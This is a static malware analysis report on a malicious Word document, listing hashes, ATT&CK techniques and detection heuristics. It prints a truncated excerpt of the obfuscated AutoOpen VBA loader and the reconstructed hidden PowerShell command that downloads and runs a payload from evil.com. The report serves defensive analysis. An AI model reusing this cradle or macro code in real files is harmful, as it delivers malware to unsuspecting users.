Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2499f8a8e36f20bb…

MALICIOUS

Office (OLE)

Size: 238.8 KB
Created: 2018-07-05 19:38:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: cf125b00cb644104c6828bd18901619c
SHA-1: 4bc87935d55ee82132f5d71fb71c1b9ad2abed3e
SHA-256: 2499f8a8e36f20bb94a0c3c3d63fd5fdaecf95261004ca6f88dcb9c4ea943f8c
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing an AutoOpen VBA macro. This macro is obfuscated and uses CreateObject and Shell calls. It constructs and executes a PowerShell command to download and execute a second-stage payload from a remote URL. The reconstructed PowerShell command is: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')".

Heuristics (8)

  • VBA macros detected (severity: medium; 5 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA.
  • Obfuscated auto-exec VBA loader (severity: critical; rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro.
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12611 bytes
SHA-256: 81bb4d86bbb1509cfd320c08bb6daff1568d7a162884460d1a71368292ab3b79

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "iiidmNjsNizdW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   RMzKhI = (68616 / UijzlJ / 40945 / GrMSVH - 37514 * LDaClj / 11160 - PoiACm)
   QQhhdP = (75420 / junvsd / 54586 / sQwdi - 63798 * kcIhz / 60842 - qUbaC)
   FwQaWq = (92086 / hmLUH / 72665 / mDiPwE - 38886 * pUKDTU / 35121 - YjGLCN)
SHQYwCqd (BzocWZIWtbS + WGXFRisUOrj + EWCRYjJZaso + MllEfLX)
   oSbvl = (22006 / FfoXT / 79009 / hlNaFL - 73637 * pPKnkA / 51222 - ZuYDHl)
   DIzwoj = (90117 / jFZZo / 74160 / zZMdL - 69969 * bNitPc / 91696 - WvsbXw)
End Sub


Attribute VB_Name = "nJUDEiaBzmrYi"
Function BzocWZIWtbS()
On Error Resume Next
EcNow = TkdiG - 29262 - (18441 * 57898 * bkcZwK / lorhj)
   rfljj = 92934 * DjIZB * (29137 / nGdqtv)
   kzDXo = ISszBk - 93239 - (59130 * 81773 * zdJZBG / Vhsir)
GUJFKwjfFm = "wershell" + "       " + "       " + "     [" + "StrIng" + "]::joI" + "n" + Chr(40) + "''," + Chr(40) + "[" + "cHAR[]]" + Chr(40) + "20, 1" + "15, 95,9" + "7, 13 ,9"
vsRuvj = CclHs - 16527 - (17228 * 12321 * tNozS / swiEMM)
   mhTti = rVDYI - 85498 - (55536 * 46749 * Nqutr / ZLOii)
   PAUAZ = GOwtJ - 23488 - (70503 * 10178 * AjuTLV / tkYQz)
obsHtKQVDsH = "4 , 85," + "71 , 2" + "9 ,9" + "5,82," + " 90 , 8" + "5 ,83 , 6"
JLlwFW = fMjjd - 52532 - (20283 * 46477 * qzwwS / MMlWE)
   WCjYWG = Ijvtf - 32555 - (90978 * 76425 * umJdV / tKjzH)
Fihiwajj = "8 , 16" + " ,126" + " , 85," + "68, 30" + " ,103,85," + "82 ,115 " + ", 92,89 ," + "85, 94,68" + ", 11 , " + "20, 66 "
ZzCapM = iadRn - 50922 - (57438 * 46906 * tMLHc / mwsrU)
   kiCFU = aiJtz - 34034 - (78549 * 85299 * XCBdz / mQdjN)
   RwJXMj = vkoJJo - 48525 - (31620 * 83611 * Jjkcwo / vXqzVm)
   Xznfak = jLZja - 65664 - (7092 * 55433 * tIUst / InKnwZ)
   TbHiRK = vKwXjj - 68422 - (22294 * 68435 * SApqb / VKjco)
DDSRiqPEOi = ", 103 ,12" + "0, 13" + ",23," + " 88, " + "68 , 68 ," + " 64, " + "10, 31 " + ", 31 "
oFuqLz = JvURV - 89806 - (52921 * 21819 * QEHPWM / BswIhi)
   GBQYb = HliCcI - 40325 - (90823 * 46309 * ZCzQtZ / vjrHB)
   hzsfJ = uPhGFz - 55402 - (69273 * 35080 * pnKPZ / qqoVwS)
   rcpLzE = EIWFDJ - 14753 - (75481 * 33072 * vSpvv / IchpU)
cbVRCc = ", 1 ,1" + " , 2, 3" + "0 , " + "1,9," + " 6 ,30 , " + "4 ,2, 3" + "0,1,8 ," + "0, 31,"
qladF = KXtLj - 96465 - (16550 * 38443 * KNkdS / QjwBiz)
   LXizJ = wnwLz - 97336 - (45827 * 49691 * szmQk / dNbXs)
   GcQUj = NkWtTP - 56855 - (98500 * 72009 * SbsMC / nPfUa)
WdwXDI = "64 ,66, " + "95 , 90" + ", 85, 83 " + ",68,6" + "7, 31 " + ", 68 ,"
aEbNmj = dcWCa - 82839 - (81833 * 20809 * RQwqj / HVGro)
GVVpGz = "81 , 68," + " 81 ," + "93 ,89, 3" + "1,68, 81," + " 68 , 81 " + ",93 , 89" + " , 31 ,9" + "6 ,66 , " + "121 ,98" + ",68,10" + "6, 8 ,31 " + ",112, 88 "
GvvPo = zqUwX - 93464 - (29513 * 3150 * wBuCk / iUszN)
   XMFuS = nQMBp - 78227 - (99526 * 42978 * cXwEc / JDosY)
rdjrm = ", 68, 6" + "8 ,64 " + ", 10" + " , 31 ," + " 31 ,71, " + "71 , 7"
BzocWZIWtbS = GUJFKwjfFm + obsHtKQVDsH + Fihiwajj + DDSRiqPEOi + cbVRCc + WdwXDI + GVVpGz + rdjrm
   RCuQh = RGZAk - 43992 - (38745 * 15459 * YHMAEG / zVNuca)
End Function
Function WGXFRisUOrj()
On Error Resume Next
iIIjqr = kwUdsh - 27661 - (42961 * 99256 * UMOFul / GohYLj)
   oYFUw = WjPlCX - 16485 - (50187 * 38990 * hjmpH / rnXPa)
   qDHYil = FjvbfI - 33001 - (31451 * 22806 * CzDGh / cbvciY)
   FlhDud = hrnqbu - 36092 - (26657 * 82878 * tTpAJ / CiEZD)
   cuKzm = WocER - 25085 - (45400 * 27111 * ArmSB / EibJT)
GJDaMNpmUX = "1, 30,93" + " ,81 ,66" + ", 83,69 " + ", 67" + " ,68 ,66 " + ",95 ," + "73,30," + " 83, 95,"
KUWoMn = wVMzjf - 65456 - (83677 * 52311 * WvJiu / jkvShz)
   YPjJEI = BDEzf - 98380 - (39867 * 84945 * kfUZq / wwMXhR)
   qEWtdJ = HEVlK - 15893 - (51153 * 19261 * OHlFKW / CPmnER)
KtcirzAz = "93 , 31, " + "94,86 " + ",92 " + ",29 ,9" + "4 ,89,91," + " 85,2" + "9 ,86"
qjLkV = Rhnas - 36358 - (96337
... (truncated)